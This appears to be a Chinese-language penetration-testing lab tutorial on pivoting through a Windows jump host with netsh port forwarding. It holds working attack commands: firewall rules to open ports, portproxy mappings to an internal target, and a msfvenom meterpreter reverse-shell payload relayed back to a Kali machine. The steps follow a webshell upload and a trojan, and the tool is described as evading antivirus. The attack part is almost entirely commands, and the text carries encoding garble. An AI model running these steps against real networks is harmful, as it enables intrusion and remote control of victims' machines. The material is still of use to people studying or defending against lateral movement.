聲明:本文僅限于技術(shù)交流探橱,請(qǐng)遵守網(wǎng)絡(luò)安全法,否則后果自負(fù)绘证。
0.實(shí)際操作視頻隧膏,請(qǐng)移步
https://www.bilibili.com/video/BV1Uv4y1R7vq/
1.netsh簡(jiǎn)介
netsh 是Windows系統(tǒng)自身提供的網(wǎng)絡(luò)配置命令行工具,所以具有免殺的效果
使用前提:administrator權(quán)限
2.環(huán)境和拓?fù)鋱D:
2.1環(huán)境
kali 網(wǎng)卡1 橋接 192.168.1.6
跳板機(jī)win7 網(wǎng)卡1 橋接 192.168.1.8? 網(wǎng)卡2 僅主機(jī)10.10.10.7
目標(biāo)及 win2012 網(wǎng)卡1 僅主機(jī) 10.10.10.13
跳板機(jī)win7開啟防火墻(域嚷那、工作組和外網(wǎng)等都開啟防火墻)胞枕,僅僅80端口對(duì)外網(wǎng)開放
netsh advfirewall firewall add rule name="Site" dir=in action=allow protocol=TCP localport=80
查看防火墻
netsh firewall show state
查看netsh規(guī)則
netsh interface portproxy show all
2.2.拓?fù)鋱D
3.滲透內(nèi)網(wǎng)步驟
3.1.獲取跳板機(jī)webshell,上傳exe木馬魏宽,反彈到kali
3.2跳板機(jī)上添加防火墻規(guī)則腐泻,允許外網(wǎng)訪問跳板機(jī)tcp協(xié)議1616端口
netsh advfirewall firewall add rule name="shiliu" dir=in action=allow protocol=TCP localport=1616
3.3添加跳板機(jī)的netsh規(guī)則把跳板機(jī)外網(wǎng)ip192.168.1.8的1616端口映射到內(nèi)網(wǎng)10.10.10.13的8080端口
netsh interface portproxy add v4tov4 listenport=1616 connectaddress=10.10.10.13 connectport=8080
3.4訪問目標(biāo)機(jī)器
http://192.168.1.8:1616/bluecms/uploads/
3.5獲取目標(biāo)機(jī)器的webshell
3.6跳板機(jī)上添加規(guī)則轉(zhuǎn)發(fā)跳板機(jī)的16161端口的流量到外網(wǎng)kali192.168.1.6的16161端口上
netsh interface portproxy add v4tov4 listenport=16161 connectaddress=192.168.1.6 connectport=16161
3.7制作木馬反彈流量到跳板機(jī)內(nèi)網(wǎng)ip10.10.10.7的16161端口上,然后再通過跳板機(jī)轉(zhuǎn)發(fā)到kali
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.7 lport=16161 -f exe -o 16.exe
3.8跳板機(jī)的防火墻添加允許TCP16161端口進(jìn)棧
netsh advfirewall firewall add rule name="16" dir=in action=allow protocol=TCP localport=16161
3.9刪除規(guī)則
netsh advfirewall firewall delete rule name="shiliu"
netsh advfirewall firewall delete rule name="16"
netsh interface portproxy delete v4tov4 listenport=1616
netsh interface portproxy delete v4tov4 listenport=16161